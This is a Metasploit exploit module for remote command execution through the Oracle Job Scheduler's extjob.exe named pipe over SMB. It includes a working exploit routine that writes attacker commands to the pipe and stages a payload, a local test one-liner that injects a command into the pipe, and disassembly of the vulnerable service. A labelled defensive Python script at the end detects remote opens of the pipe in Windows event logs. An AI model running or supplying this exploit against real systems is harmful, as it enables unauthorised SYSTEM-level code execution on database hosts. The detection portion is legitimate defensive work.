GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/oracle/extjob.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Oracle Job Scheduler Named Pipe Command Execution',
      'Description'     => %q{
        This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job
        Scheduler is implemented via the component extjob.exe, which listens on a named pipe
        called "orcljsex<SID>" and executes arbitrary commands received over this channel via
        CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.
        Note that the Job Scheduler is disabled in default installations.
      },
      'Author'          =>
        [
          'David Litchfield', # Vulnerability discovery and exploit
          'juan vazquez',     # Metasploit module
          'sinn3r'            # Metasploit fu
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ],
        ],
      'Payload'         =>
        {
          'Space' => 2048,
        },
      'Platform'        => 'win',
      # This module has been tested on Oracle 10g Release 1
      # where the Oracle Job Scheduler runs as SYSTEM on Windows
      'Targets'         => [['Automatic', {}]],
      'CmdStagerFlavor' => 'vbs',
      'Privileged'      => true,
      'DisclosureDate'  => '2007-01-01',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('SID', [ true, 'The database sid', 'ORCL'])
      ])
  end

  def exploit
    if check == Exploit::CheckCode::Vulnerable
      print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")
      execute_cmdstager({:linemax => 1500})
      handler
    else
      print_error "Host does not appear to be vulnerable!"
    end
  end

  # Called by the CmdStager mixin for each staged command line: every
  # command is written as-is to the extjob.exe named pipe over SMB.
  def execute_command(cmd, opts)
    connect()
    smb_login()
    pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")
    pipe.write("cmd.exe /q /c #{cmd}")
    pipe.close
    disconnect
  end

  def check
    begin
      connect()
      smb_login()
      pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")
      pipe.write("cmd.exe /q /c dir")
      result = pipe.read() # Exit Code
      pipe.close
      disconnect
    rescue
      return Exploit::CheckCode::Safe
    end

    if result == "1" # Exit Code should be 1
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end
end

=begin
How To Test locally:
1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and
   then Start the service.
2. Make sure you know your SMBUser and SMBPass
3. Run:
   C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl

Code Analysis of extjob.exe (Oracle 10g Release 1)
=================================================

From _ServiceStart():

* Create Named Pipe and store handle on "esi":

.text:004017EC push offset _pipename
.text:004017F1 lea ecx, [ebp+Name]
.text:004017F7 push offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s"
.text:004017FC push ecx
.text:004017FD jmp short loc_401810
.text:004017FF ; ---------------------------------------------------------------------------
.text:004017FF
.text:004017FF loc_4017FF: ; CODE XREF: _ServiceStart+FAj
.text:004017FF push offset $SG59613
.text:00401804 lea edx, [ebp+Name]
.text:0040180A push offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s"
.text:0040180F push edx ; Dest
.text:00401810
.text:00401810 loc_401810: ; CODE XREF: _ServiceStart+10Dj
.text:00401810 call ds:__imp__sprintf
.text:00401816 add esp, 0Ch
.text:00401819 push edi
.text:0040181A push edi
.text:0040181B push 4
.text:0040181D call _ReportStatusToSCMgr
.text:00401822 add esp, 0Ch
.text:00401825 test eax, eax
.text:00401827 jz loc_4018EC
.text:0040182D mov edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x)
.text:0040185C mov esi, eax

* Connect Named Pipe

.text:0040188F push eax ; lpOverlapped
.text:00401890 push esi ; hNamedPipe
.text:00401891 call ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x)

* Create Thread with ExecMain() as lpStartAddress and esi (the pipe handle) as parameter

.text:004018B9 lea edx, [ebp+ThreadId]
.text:004018BC push edx ; lpThreadId
.text:004018BD push 0 ; dwCreationFlags
.text:004018BF push esi ; lpParameter
.text:004018C0 push offset _ExecMain ; lpStartAddress
.text:004018C5 push 0 ; dwStackSize
.text:004018C7 push 0 ; lpThreadAttributes
.text:004018C9 call ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x)

From ExecMain():

* Stores Named Pipe Handle in ebx

.text:0040197C mov ebx, [ebp+hObject]

* Read From Named Pipe (up to 0x10000 bytes into a stack buffer)

.text:004019C4 lea eax, [ebp+NumberOfBytesRead]
.text:004019C7 push edx ; lpOverlapped
.text:004019C8 push eax ; lpNumberOfBytesRead
.text:004019C9 lea ecx, [ebp+Buffer]
.text:004019CF push 10000h ; nNumberOfBytesToRead
.text:004019D4 push ecx ; lpBuffer
.text:004019D5 push ebx ; hFile
.text:004019D6 call ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x)

* CreateProcess with lpCommandLine fully controlled by the user input (the buffer read from the pipe)

.text:00401A06 mov ecx, 11h
.text:00401A0B xor eax, eax
.text:00401A0D lea edi, [ebp+StartupInfo]
.text:00401A10 push esi
.text:00401A11 rep stosd
.text:00401A13 lea eax, [ebp+ProcessInformation]
.text:00401A16 lea ecx, [ebp+StartupInfo]
.text:00401A19 push eax ; lpProcessInformation
.text:00401A1A push ecx ; lpStartupInfo
.text:00401A1B push 0 ; lpCurrentDirectory
.text:00401A1D push 0 ; lpEnvironment
.text:00401A1F push 0 ; dwCreationFlags
.text:00401A21 push 0 ; bInheritHandles
.text:00401A23 push 0 ; lpThreadAttributes
.text:00401A25 lea edx, [ebp+Buffer]
.text:00401A2B push 0 ; lpProcessAttributes
.text:00401A2D push edx ; lpCommandLine
.text:00401A2E push 0 ; lpApplicationName
.text:00401A30 mov [ebp+StartupInfo.cb], 44h
.text:00401A37 mov [ebp+StartupInfo.wShowWindow], 5
.text:00401A3D mov [ebp+StartupInfo.dwFlags], 100h
.text:00401A44 mov [ebp+StartupInfo.lpDesktop], offset $SG59671
.text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)

=end
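As an added defensive example, not part of the Metasploit module or of extjob.exe: the module description and the disassembly above show that remote use of this channel requires opening the orcljsex<SID> pipe over SMB, which on the Oracle host is recorded by Windows Security event 5145 (network share object access) against the IPC$ share. The script below scans constructed, simplified key=value renderings of such events (the field names follow the real event, the values and the line format are assumed for this example) and reports which client, as which account, opened an extjob pipe.

```python
import re
from typing import Dict, List

# Constructed sample: one simplified Security event 5145/5140 record per line.
# Field names mirror the real event (IpAddress, ShareName, RelativeTargetName);
# the hosts, users and SIDs are made up for this example.
SAMPLE_EVENTS = r"""
EventID=5145 SubjectUserName=oradba IpAddress=10.0.0.25 ShareName=\\*\IPC$ RelativeTargetName=orcljsexORCL AccessMask=0x12019f
EventID=5145 SubjectUserName=backup IpAddress=10.0.0.30 ShareName=\\*\IPC$ RelativeTargetName=srvsvc AccessMask=0x12019f
EventID=5145 SubjectUserName=alice IpAddress=10.0.0.31 ShareName=\\*\Data RelativeTargetName=orcljsexORCL.txt AccessMask=0x120089
EventID=5140 SubjectUserName=bob IpAddress=10.0.0.32 ShareName=\\*\IPC$ AccessMask=0x1
EventID=5145 SubjectUserName=svc_app IpAddress=10.0.0.40 ShareName=\\*\IPC$ RelativeTargetName=OrclJsExTEST AccessMask=0x12019f
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
# extjob.exe builds the pipe name with sprintf("\\.\pipe\orcljsex%s", sid);
# over SMB the RelativeTargetName is the bare pipe name, possibly with a
# leading backslash, so match "orcljsex" + SID case-insensitively.
PIPE_RE = re.compile(r"^\\*orcljsex(?P<sid>\w+)$", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value event line into a field dict."""
    return dict(FIELD_RE.findall(line))


def is_extjob_pipe_access(ev: Dict[str, str]) -> bool:
    """True when a 5145 event records a client opening orcljsex<SID> via IPC$."""
    if ev.get("EventID") != "5145":
        return False
    if not ev.get("ShareName", "").upper().endswith("IPC$"):
        return False  # same name on a file share is not the pipe
    return PIPE_RE.match(ev.get("RelativeTargetName", "")) is not None


def find_extjob_pipe_access(log_text: str) -> List[Dict[str, str]]:
    """Return one alert per remote open of an extjob named pipe."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_extjob_pipe_access(ev):
            sid = PIPE_RE.match(ev["RelativeTargetName"]).group("sid")
            alerts.append({"src": ev.get("IpAddress", "?"),
                           "user": ev.get("SubjectUserName", "?"),
                           "sid": sid})
    return alerts


if __name__ == "__main__":
    for a in find_extjob_pipe_access(SAMPLE_EVENTS):
        print(f"extjob pipe opened from {a['src']} as {a['user']} (SID {a['sid']})")
```

Because every command the service runs arrives through this pipe, any 5145 record for it from a host that is not an expected Oracle client is worth investigating, and the service itself should stay disabled unless it is needed.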